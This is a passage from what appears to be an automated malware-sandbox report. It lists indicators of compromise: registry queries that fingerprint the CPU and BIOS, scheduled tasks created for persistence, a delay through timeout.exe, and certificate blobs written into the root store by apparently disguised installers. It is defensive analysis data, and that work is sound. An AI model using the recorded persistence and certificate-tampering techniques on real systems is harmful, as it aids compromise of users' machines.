value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 lIziCFK1Rfh68XBj6eK8MOCp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier lIziCFK1Rfh68XBj6eK8MOCp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5344 schtasks.exe 5128 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 9212 timeout.exe -
Enumerates system info in registry 2 TTPs 37 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU lIziCFK1Rfh68XBj6eK8MOCp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MsiExec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU MsiExec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS lIziCFK1Rfh68XBj6eK8MOCp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Weather Installation.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 